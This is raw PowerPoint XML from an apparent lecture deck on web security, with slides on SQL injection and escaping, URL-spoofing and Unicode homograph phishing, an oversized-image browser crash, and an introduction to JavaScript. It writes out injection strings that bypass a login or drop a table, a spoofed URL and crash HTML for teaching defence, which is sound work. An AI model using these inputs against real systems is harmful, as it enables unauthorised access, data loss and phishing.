              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* from users where user='$username' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Special strings can be entered by attacker</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* from users where user='M' OR '1=1' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='M' OR '1=1' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Result: access obtained without password</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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="926974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improvements ... </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query modify: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user,pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from users where user='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=“M' OR '1=1”; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Result: the entire table </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can check:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only one tuple result</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>• formal correctness of the result </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=“M' ; drop table user;”?</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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1838480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Solution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• We can use an Escape method, where all “malicious” characters will be changed: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Escape(“t ' c”) gives as a result “t \' c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user,pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from users where user='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=escape(“M' ;drop table user;”) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• The result is the safe query: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user,pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>where user='M\' drop table user;\'' </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="746623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2761" y="2475145"/>
            <a:ext cx="5504428" cy="64359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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15156712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Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-U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2255876"/>
            <a:ext cx="11444749" cy="6852154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6189528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Obfuscation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2080250"/>
            <a:ext cx="5527040" cy="6188570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>of page in previous slide </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Actual URL different from spoofed URL displayed in address bar </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>URL escape character attack </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>–  Old versions of Internet Explorer did not display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>anything past the Esc or null character </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>–  Displayed vs. actual site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>http://trusted.com%01%00@malicious.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Unicode attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>–  Domains names with Unicode characters can be registered </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>–  Identical, or very similar, graphic rendering for some characters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>–  E.g., Cyrillic and Latin “a” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>–  Phishing attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>paypal.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>–  Current version of browsers display Punycode, an ASCII-encoded version of Unicode: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>www.xn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>--pypal-4ve.com </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0735" y="2223145"/>
            <a:ext cx="5073445" cy="6664747"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55B28040-0FD8-C544-8357-9EE6C5A36700}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72409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 Image Crash </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser implementation bugs can lead to denial of service attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The classic image crash in Internet Explorer is a perfect example </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>By creating a simple image of extremely large proportions, one can crash Internet Explorer and sometimes freeze a Windows machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTML&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>BODY&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>IMG SRC="./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>imagecrash.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>" width="9999999" height="9999999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> 		&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>BODY&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTML&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Variations of the image crash attack still possible on the latest IE version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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="558473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Confidentiality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is mobile code?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Executable program</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Sent via a computer network – Executed at the destination </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Plugins</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrated Java Virtual Machines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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77183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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting language interpreted by the browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code enclosed within &lt;script&gt; ... &lt;/script&gt; tags </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defining functions:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hello() { alert("Hello world!"); } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event handlers embedded in HTML</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>picture.gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onMouseOver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
